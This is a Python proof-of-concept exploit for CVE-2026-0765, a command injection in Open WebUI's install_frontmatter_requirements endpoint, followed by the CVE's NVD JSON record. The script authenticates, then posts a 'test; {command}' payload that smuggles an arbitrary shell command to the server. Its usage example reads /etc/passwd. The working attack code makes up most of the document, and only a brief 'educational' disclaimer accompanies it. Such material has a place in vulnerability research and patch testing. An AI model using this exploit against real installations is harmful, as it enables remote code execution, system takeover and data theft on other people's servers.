CVE-2026-0765

#!/usr/bin/env python3 """ CVE-2026-0765 PoC - Open WebUI Command Injection Note: This is for educational/testing purposes only """ import requests import json import sys def exploit_cve_2026_0765(target_url, username, password, command): """ Exploit for Open WebUI command injection in install_frontmatter_requirements Args: target_url: Base URL of Open WebUI instance username: Valid username for authentication password: User password command: Command to execute on the target system """ session = requests.Session() # Step 1: Authenticate to get valid session login_url = f"{target_url}/api/v1/auth/login" login_data = { "username": username, "password": password } try: response = session.post(login_url, json=login_data, timeout=10) if response.status_code != 200: print(f"[-] Authentication failed: {response.status_code}") return False token = response.json().get("access_token") print(f"[+] Successfully authenticated") except Exception as e: print(f"[-] Authentication error: {e}") return False # Step 2: Inject malicious command via install_frontmatter_requirements exploit_url = f"{target_url}/api/v1/frontend/function/install_frontmatter_requirements" headers = { "Authorization": f"Bearer {token}", "Content-Type": "application/json" } # Payload: Inject command using command separator (; or &&) payload = f"test; {command}" exploit_data = { "requirements": payload } try: response = session.post(exploit_url, json=exploit_data, headers=headers, timeout=10) if response.status_code == 200: print(f"[+] Exploit sent successfully") print(f"[+] Command executed: {command}") return True else: print(f"[-] Exploit failed: {response.status_code}") print(f"[-] Response: {response.text}") return False except Exception as e: print(f"[-] Exploitation error: {e}") return False if __name__ == "__main__": if len(sys.argv) < 5: print("Usage: python3 cve-2026-0765.py <target_url> <username> <password> <command>") print("Example: python3 cve-2026-0765.py http://localhost:3000 admin password 'cat /etc/passwd'") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] cmd = sys.argv[4] exploit_cve_2026_0765(target, user, pwd, cmd)

{"cve": {"id": "CVE-2026-0765", "sourceIdentifier": "[email protected]", "published": "2026-01-23T04:16:03.390", "lastModified": "2026-01-30T19:48:35.070", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Open WebUI PIP install_frontmatter_requirements Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Open WebUI. Authentication is required to exploit this vulnerability.\n\nThe specific flaw exists within the install_frontmatter_requirements function.The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-28258."}, {"lang": "es", "value": "Vulnerabilidad de inyección de comandos y ejecución remota de código en Open WebUI PIP install_frontmatter_requirements. Esta vulnerabilidad permite a atacantes remotos ejecutar código arbitrario en instalaciones afectadas de Open WebUI. Se requiere autenticación para explotar esta vulnerabilidad.\n\nLa falla específica reside dentro de la función install_frontmatter_requirements. El problema se debe a la falta de validación adecuada de una cadena proporcionada por el usuario antes de usarla para ejecutar una llamada al sistema. Un atacante puede aprovechar esta vulnerabilidad para ejecutar código en el contexto de la cuenta de servicio. Fue ZDI-CAN-28258."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openwebui:open_webui:0.6.32:*:*:*:*:*:*:*", "matchCriteriaId": "2B5D5634-470E-499C-A7C3-A5FD7277D287"}]}]}], "references": [{"url": "https://www.zerodayinitiative.com/advisories/ZDI-26-031/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}